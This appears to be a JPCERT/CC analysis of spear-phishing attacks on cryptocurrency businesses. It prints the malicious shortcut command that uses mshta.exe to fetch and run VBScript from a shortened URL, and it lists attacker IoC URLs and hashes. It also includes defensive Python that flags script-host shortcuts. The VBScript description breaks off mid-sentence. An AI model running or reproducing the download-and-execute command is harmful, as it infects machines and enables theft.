Spear Phishing against Cryptocurrency Businesses
As of June 2019, JPCERT/CC has observed targeted emails to some Japanese organisations. These emails contain a URL to a cloud service and convince recipients to download a zip file which contains a malicious shortcut file. This article will describe the details of the attack method.
How the VBScript downloader is launched
The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file named “Password.txt.lnk”, evidently meant to pass for the text file holding the document's password. The shortcut embeds a command line that runs as soon as the file is opened. The image below illustrates the flow of events from the shortcut being executed until the VBScript-based downloader is launched.
The shortcut file contains the following command:
C:\Windows\System32\mshta.exe https://bit.ly/31O88c3
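A shortcut like this can be triaged statically, without running it, by parsing the .lnk file and checking for exactly the pattern above: a script host such as mshta.exe as the target, a URL in the arguments, and a document-style double extension in the file name. The following Python is an added example, not JPCERT/CC's code or the sample's. It implements only the parts of the MS-SHLLINK format needed to recover the target and arguments (the header, skipping the LinkTargetIDList, LocalBasePath from LinkInfo, and the StringData entries) and constructs a sample shortcut inline with build_lnk(); the only value taken from the article is the shortened URL. The SCRIPT_HOSTS list and the double-extension regex are assumptions to tune for your own environment.

```python
"""Static triage of a Windows shortcut (.lnk) for the mshta + URL pattern.

Added example, not JPCERT/CC's code. Parses just enough of MS-SHLLINK
(ShellLinkHeader, LinkInfo.LocalBasePath, StringData) to recover what a
shortcut launches, then flags script-host + URL combinations. The sample
shortcut is constructed inline by build_lnk(); the only value taken from
the article is the shortened URL.
"""
import re
import struct

HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046}, the Shell Link CLSID, little-endian
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
FLAG_HAS_IDLIST, FLAG_HAS_LINKINFO, FLAG_HAS_NAME = 0x01, 0x02, 0x04
FLAG_HAS_RELPATH, FLAG_HAS_WORKDIR, FLAG_HAS_ARGS = 0x08, 0x10, 0x20
FLAG_HAS_ICON, FLAG_IS_UNICODE = 0x40, 0x80

# StringData entries in storage order, each present only if its flag is set.
STRING_FIELDS = [("name", FLAG_HAS_NAME), ("relative_path", FLAG_HAS_RELPATH),
                 ("working_dir", FLAG_HAS_WORKDIR), ("arguments", FLAG_HAS_ARGS),
                 ("icon_location", FLAG_HAS_ICON)]

# Script/HTML hosts worth flagging as a shortcut target (assumption: tune per estate).
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
DOUBLE_EXT_RE = re.compile(r"\.(txt|pdf|docx?|xlsx?|jpe?g|png)\.lnk$", re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, LocalBasePath (if any) and the StringData fields."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]      # LinkFlags follows the CLSID
    fields = {"flags": flags}
    pos = HEADER_SIZE
    if flags & FLAG_HAS_IDLIST:                        # uint16 IDListSize + item list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG_HAS_LINKINFO:                      # LinkInfoSize includes itself
        li_size, _hdr, li_flags, _vol_off, lbp_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x01:                            # VolumeIDAndLocalBasePath: NUL-terminated ANSI
            end = data.index(b"\x00", pos + lbp_off)
            fields["local_base_path"] = data[pos + lbp_off:end].decode("cp1252")
        pos += li_size
    unicode = bool(flags & FLAG_IS_UNICODE)
    for name, flag in STRING_FIELDS:                   # uint16 CountCharacters + chars
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if unicode else count
        fields[name] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return fields


def triage_lnk(filename: str, data: bytes) -> list:
    """Return the reasons a shortcut looks like a script-host downloader ([] if clean)."""
    info = parse_lnk(data)
    target = info.get("local_base_path") or info.get("relative_path", "")
    exe = target.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = info.get("arguments", "")
    reasons = []
    if exe in SCRIPT_HOSTS:
        reasons.append(f"target is script host {exe}")
    url = URL_RE.search(args)
    if url:
        reasons.append(f"arguments carry a URL: {url.group(0)}")
    if DOUBLE_EXT_RE.search(filename):
        reasons.append("double extension disguises .lnk as a document")
    return reasons


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode .lnk (header + RelativePath + Arguments) for testing."""
    flags = FLAG_HAS_RELPATH | FLAG_HAS_ARGS | FLAG_IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ShowCommand = SW_SHOWNORMAL

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


if __name__ == "__main__":
    # Constructed sample mirroring the article's shortcut: mshta.exe + shortened URL.
    sample = build_lnk("..\\..\\..\\Windows\\System32\\mshta.exe", "https://bit.ly/31O88c3")
    for reason in triage_lnk("Password.txt.lnk", sample):
        print(reason)
```

Real-world shortcuts usually store the absolute target in LinkInfo.LocalBasePath rather than RelativePath, which is why triage_lnk prefers the former; shortcuts that only carry a LinkTargetIDList (no LinkInfo, no RelativePath) would need an ItemID parser as well, which this example omits.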
When the shortcut is executed, mshta.exe requests the shortened URL, follows the redirect to the following site, and retrieves an HTML file containing the VBScript (Figure 2). mshta.exe executes that script directly from the retrieved HTML, so the user never has to open a second file.
http://service.amzonnews.club:8080/open?id=3F%2BE7HwXzwMRiysADDAgev15bAPluuPYB%2BufUnqYMCw%3D
The behaviour of the VBScript is described in Figure 3. First, …
IoC
75.133.9.84
http://service.amzonnews.club:8080/open?id=3F%2BE7HwXzwMRiysADDAgev15bAPluuPYB%2BufUnqYMCw%3D
http://update.gdrives.top:8080/open?id=b7hMO0D%2ByNbNZSqXu4Putub%2BZLLqg/S66Foz0YKUjety914cQmWz32MV6BE44pEd
https://bit.ly/2SGs76y
https://bit.ly/31O88c3
10ce173cfe83321b44139e3d7d20c5ac1a9c1c99882387af0fdbadcfa2597651
122674a261ac7061c8a304f3e4a1fb13023f39102e5605e30f7aad0ab388dfa0
1533374acf886bc3015c4cba3da1c67e67111c22d00a8bbf7694c5394b91b9fc
4ecab0f81a2da70df5f2260bab7c8c130b200dbfe2bbd8e3d1845ff0c93c7861
57278dab6a0e8438444996503a6528ff8a816be0060d5e5db7a6ab1a0d6122f1
71346d2cb7ecf45d7fe221ede76da51a2ecb85110b9b27f1cb64c30f9af69250
7446efa798cfa7908e78e7fb2bf3ac57486be4d2edea8a798683c949d504dee6